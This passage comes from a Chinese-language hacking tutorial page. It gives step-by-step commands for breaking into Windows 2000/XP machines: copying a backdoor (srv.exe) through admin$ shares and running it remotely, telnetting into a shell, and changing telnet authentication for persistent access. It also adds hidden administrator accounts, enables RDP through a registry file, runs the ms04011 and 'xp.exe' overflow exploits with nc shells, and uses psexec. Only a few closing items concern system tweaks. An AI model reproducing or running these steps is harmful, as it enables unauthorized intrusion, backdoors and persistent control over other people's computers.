         [3]  C:\>copy srv.exe \\127.0.0.1\admin$\system32 
                将一次性后门 srv.exe 复制到对方的系统文件夹下,前提是 admin$ 开启                        

         [4]  C:\>net time \\127.0.0.1           查看远程主机的当前时间 
         [5]  C:\>at \\127.0.0.1 时间 srv.exe 
               用 at 命令远程运行 srv.exe ,需要对方开启了 'Task Scheduler' 服务  
         [6]  C:\>net time \\127.0.0.1 
               再次查看当前时间来估算 srv.exe 是否已经运行,此步可以省略
         [7]  C:\>telnet 127.0.0.1 99 
               开一个新窗口,用 telnet 远程登陆到127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思?那你就把它想象成

              远程机器的控制权就好了,操作像 DOS),99 端口是srv.exe 开的一次性后门的端口  
         [8]  C:\WINNT\system32>net start telnet 
              我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务,毕竟 srv.exe 是一次性的后门,我们需要一个长久的后

              门便于以后访问,如果对方的 telnet 已经启动,此步可省略
         [9]  C:\>copy ntlm.exe \\127.0.0.1\admin$\system32 
                在原来那个窗口中将 ntlm.exe 传过去, ntlm.exe 是用来更改 telnet 身份验证的  
         [10] C:\WINNT\system32>ntlm.exe 
                在 shell 窗口中运行 ntlm.exe ,以后你就可以畅通无阻的 telnet 这台主机了
         [11]  C:\>telnet 127.0.0.1 23 
                 在新窗口中 telnet 到 127.0.0.1 ,端口 23 可省略,这样我们又获得一个长期的后门
         [12]  C:\WINNT\system32>net user 帐户名 密码 /add
                 C:\WINNT\system32>net uesr guest /active:yes
                 C:\WINNT\system32>net localgroup administrators 帐户名 /add 
                  telnet 上以后,你可以建立新帐户,激活 guest ,把任何帐户加入管理员组等 

        好了,写到这里我似乎回到了 2 , 3 年前,那时的 ipc$ 大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的 ipc$ 入侵吧。 
        [13]  psexec.exe \\IP -u 管理员帐号 -p 密码 cmd    \\ 用这个工具我们可以一步到位的获得 shell 
                OpenTelnet.exe \\server 管理员帐号 密码 NTLM 的认证方式 port   \\ 用它可以方便的更改 telnet 的验证方式和

                端口,方便我们登陆

56.xp系统入侵
    1.开启远程桌面(3389端口)
       将下面三行复制到记事本,该后缀名为3389.reg  双击即可打开3389端口(远程桌面连接功能) 
       Windows Registry Editor Version 5.00

       [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
       "fDenyTSConnections"=dword:00000000
       将3389.reg复制到目标机上(复制要先得到目标的权限)
       在目标机上导入3389.reg 的dos命令:regedit /s c:\3389.reg  或 regedit /e c:\123.reg
       再在运行输入mstsc 在弹出的窗口中输入目标机的IP 即可连接到目标机的桌面

     2.xp 系统入侵
        [1].入侵一:
            入侵对方电脑前提:
            (1).控制面板------>服务----->本地安全策略------>安全选项-->"网络访问:本地账户的共享和安全模式 "为"经典-本地用户以自己的身份验证"
                可通过修改注册表改为"经典-本地用户以自己的身份验证":
                 Windows Registry Editor Version 5.00

                 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
                 "forceguest"=dword:00000000

            (2).控制面板------>服务----->本地安全策略------>安全选项-->"账户:来宾用户状态" 为已启用
                 net user guest /active:yes 可开启

            (3).有对方用户名和密码  
            入侵步骤:
            (1).开始菜单----->运行----->cmd-->键入net use \\192.168.0.1\ipc$ " 密码 " /user:" 用户名 "  
                 例: net use \\192.168.0.1\ipc$ "" /user:"administrator"

            (2).我的电脑---->管理---->操作--->连接到另一台计算机---->输入对方计算机名或IP
                 当连接上了以后----->点击左边的"服务和应用程序",服务---->开启 telnet 服务

            (3).开始菜单----->运行----->cmd-->telnet 192.168.0.1 即可获得对方shell        
       [2].入侵二:使用xp溢出(没成功过)
            在网上下载一个xp.exe 或 ms04011 
            (1).xp溢出使用方法: xp <Target ID> <Target IP> 例:D:\xp.exe 15 192.168.0.1 溢出成功即可获得对方shell
            (2).ms04011 使用
                 D:\>ms04011 1 192.168.8.222 1122
                        shellcode size 404
                        Ret value = 1727
                 再开一个shell
                 D:\>nc 192.168.8.222 1122

                      如果出现引号内容
                      "Microsoft Windows XP [版本 5.1.2600]
                      (C) 版权所有 1985-2001 Microsoft Corp. "
                 则表示溢出成功,获得对方shell,这样即可在对方机上执行任何命令

       [3].借助 psexec.exe 工具
             前提:对方有共享admin$;net share admin$ 即可共享admin$,删除 net share admin$ /del
             psexec.exe \\IP -u 管理员帐号 -p 密码 cmd    \\ 用这个工具我们可以一步到位的获得 shell 
             例:D:\psexec.exe \\192.168.0.1 -u administrator -p "" cmd
57.系统防护:(好像不行)
     控制面板—>管理工具—>本地安全策略”,展开“本地策略”—“用户权利指派”。

     在右边有一个“拒绝从网络访问这台计算机”-->添加用户和组, 添加Guest用户即可让别人不能从网络访问本机     
58.禁用的at服务dos命令开启?
     先运行“sc config Schedule start= DEMAND”,再运行一遍“net start schedule”

59.注册表解禁
     1).在Windows 2000/XP/2003中,我们可以通过单击“开始→运行”,输入“Gpedit.msc”后回车,打开“组策略”。
         然后依次展开“用户配置→管理模板→系统”,双击右侧窗口中的“阻止访问注册表编辑工具”,在弹出的窗口中选择“已禁用”,“确定”后再退出“组策略”,即可为注册表解锁.  
     2).用记事本编辑一个任意名字的.reg文件,比如注册表qifan.reg,内容如下:
        REGEDIT4

        [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]
        " DisableRegistryTools "=dword:00000000

        存盘。然后双击它就好

60.运行隐藏
    1:打开组策略编辑器(可以在任务管理器的文件菜单下面点新建任务,输入gpedit.msc打开,也可以直接在系统盘的windows\system32目录下面找到
       gpedit.msc这个文件打开)展开左边最下面一个管理模板,点任务栏和开始菜单,确认“从开始菜单中删除‘运行’菜单”没有被启用(要是被启用,
       就双击打开它的属性,设置成未被配置或已禁用,最好是已禁用,这样别的一些优化软件如果禁用了运行,这这里都可以显示了。)

    2:如果上面设置后还是没有的话,就用这个方法。 
       在任务栏点右键,打开“任务栏和开始菜单属性”点击开始菜单,下面有两个选项,如果你是XP默认的开始菜单,则点击开始菜单后面的“自定义”点
      “高级”,在开始菜        单项目里面最后一个选项“运行命令”前打上勾,这样运行就出现了。如果你是经典开始菜单就选择它后面的“自定义”在开
       始菜单选项里面把“显示运行”勾上,然后应用就可以了。当然你先设置“2”再设置“1”也是可的  

    3:将以下内容复制到写字板中然后存为1.reg双击打开1.reg文件就可恢复了。
       [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explore r]    "NoRun"=dword:00000000 

61.让文件不能删除 ren name E:\123.txt " ./"      删除用文件暴力删除器或360粉碎机

62.runas /profile /user:administrator cmd.exe  查看 administrator 用户的权限   

63.Telnet 你可以更改为一个其他的端口(默认23),  这样别人可能就不知道是不是开了telnet服务了。这个项也我 们 利 用Telnet服务器更自由了。在
    Telnet服务器配置这些参数中,可以使用tlntadmn.exe命令来进行非常方便的配置,配置后需要重新启动Telnet  服务。  
64.记事本打开指定位置文件:notepad C:\1.txt  可直接再运行窗口执行

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!